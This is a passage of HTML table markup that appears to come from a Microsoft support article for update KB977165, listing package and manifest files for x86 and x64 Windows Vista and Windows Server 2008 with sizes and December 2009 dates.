class=\"sbody-td\">09-Dec-2009</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">12:02</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_for_kb977165_sc_0~31bf3856ad364e35~x86~~6.0.1.1.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">1,431</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">09-Dec-2009</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">12:01</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_for_kb977165_sc_1_bf~31bf3856ad364e35~x86~~6.0.1.1.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">1,672</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">09-Dec-2009</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">12:02</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_for_kb977165_sc_1~31bf3856ad364e35~x86~~6.0.1.1.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">1,699</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">09-Dec-2009</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">12:01</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_for_kb977165_sc_bf~31bf3856ad364e35~x86~~6.0.1.1.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">1,679</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">09-Dec-2009</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">12:02</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_for_kb977165_sc~31bf3856ad364e35~x86~~6.0.1.1.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">1,710</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">09-Dec-2009</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">12:01</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_for_kb977165_server_0_bf~31bf3856ad364e35~x86~~6.0.1.1.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">1,415</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">09-Dec-2009</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">12:02</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_for_kb977165_server_0~31bf3856ad364e35~x86~~6.0.1.1.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">1,434</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">09-Dec-2009</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">12:01</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_for_kb977165_server_1_bf~31bf3856ad364e35~x86~~6.0.1.1.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">1,676</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">09-Dec-2009</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">12:02</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_for_kb977165_server_1~31bf3856ad364e35~x86~~6.0.1.1.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">1,703</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">09-Dec-2009</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">12:01</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_for_kb977165_server_bf~31bf3856ad364e35~x86~~6.0.1.1.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">1,691</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">09-Dec-2009</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">12:02</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_for_kb977165_server~31bf3856ad364e35~x86~~6.0.1.1.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">1,722</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">09-Dec-2009</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">12:01</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_for_kb977165_winpesrv_0_bf~31bf3856ad364e35~x86~~6.0.1.1.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">1,412</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">09-Dec-2009</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">12:02</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_for_kb977165_winpesrv_0~31bf3856ad364e35~x86~~6.0.1.1.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">1,431</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">09-Dec-2009</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">12:01</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_for_kb977165_winpesrv_bf~31bf3856ad364e35~x86~~6.0.1.1.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">1,420</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">09-Dec-2009</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">12:02</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_for_kb977165_winpesrv~31bf3856ad364e35~x86~~6.0.1.1.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">1,439</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">09-Dec-2009</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">12:01</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_for_kb977165_winpe_0_bf~31bf3856ad364e35~x86~~6.0.1.1.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">1,410</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">09-Dec-2009</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">12:02</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_for_kb977165_winpe_0~31bf3856ad364e35~x86~~6.0.1.1.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">1,429</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">09-Dec-2009</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">12:01</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_for_kb977165_winpe_bf~31bf3856ad364e35~x86~~6.0.1.1.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">1,414</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">09-Dec-2009</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">12:02</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_for_kb977165_winpe~31bf3856ad364e35~x86~~6.0.1.1.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">1,433</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">09-Dec-2009</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">12:01</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Update-bf.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">3,969</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">09-Dec-2009</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">12:02</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">X86_00f291c781eab5259f65cfbb1303550e_31bf3856ad364e35_6.0.6000.21175_none_53e12c479d0d70a5.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">697</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">09-Dec-2009</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">12:01</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">X86_06c8a6304295b11c92d408a2ea8e7ed5_31bf3856ad364e35_6.0.6001.22577_none_83f9e703afc5a8c5.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">697</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">09-Dec-2009</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">12:01</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">X86_210c9a86b06cc98bd2a56192a54be8e5_31bf3856ad364e35_6.0.6002.18160_none_7dd0d7fe8bdb92d5.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">697</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">09-Dec-2009</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">12:01</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">X86_9a981f487828ef128322aad13c6b2556_31bf3856ad364e35_6.0.6000.16973_none_96dd81a9e3915f4a.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">697</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">09-Dec-2009</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">12:01</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">X86_a9092dd3faec18d3ac058c22b4cc077d_31bf3856ad364e35_6.0.6002.22283_none_5ab4a5ad93ea88e5.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">697</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">09-Dec-2009</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">12:01</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">X86_c5a93d52be5c462db8b1ba4bb59d8c93_31bf3856ad364e35_6.0.6001.18377_none_81eb79034f18a5f6.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">697</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">09-Dec-2009</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">12:01</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">X86_microsoft-windows-os-kernel_31bf3856ad364e35_6.0.6000.16973_none_6a017a16b7328888.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">17,806</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">08-Dec-2009</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">21:55</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">X86_microsoft-windows-os-kernel_31bf3856ad364e35_6.0.6000.21175_none_6a8cef97d04e8e42.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">17,806</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">08-Dec-2009</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">22:53</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">X 86_microsoft-windows-os-kernel_31bf3856ad364e35_6.0.6001.18377_none_6bebb9e4b4557ed5.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">17,806</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">08-Dec-2009</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">22:13</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">X86_microsoft-windows-os-kernel_31bf3856ad364e35_6.0.6001.22577_none_6c755895cd731bc6.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">17,806</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">08-Dec-2009</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">21:59</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">X86_microsoft-windows-os-kernel_31bf3856ad364e35_6.0.6002.18160_none_6dd5fb98b17a03ce.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">17,806</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">08-Dec-2009</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">21:24</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">X86_microsoft-windows-os-kernel_31bf3856ad364e35_6.0.6002.22283_none_6e4cf969caa5277f.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">17,806</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">08-Dec-2009</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">21:38</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr></table></div><h4 class=\"sbody-h4\">Additional files for all supported x64-based versions of Windows Vista and Windows Server 2008</h4><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Amd64_12fd066e1248376a394520d0f9b837c3_31bf3856ad364e35_6.0.6001.18377_none_59b0dae5e9a4d7bc.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">701</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">09-Dec-2009</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">12:01</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Amd64_2ac8ebeb833a2a6303a840a24d3ad824_31bf3856ad364e35_6.0.6002.18160_none_e603fe2e2b7c7b83.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">701</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">09-Dec-2009</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">12:01</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Amd64_2b08ea9d830963df154cdeb31e6488c1_31bf3856ad364e35_6.0.6001.22577_none_4b11093a3b13d5ec.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">701</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">09-Dec-2009</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">12:01</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td 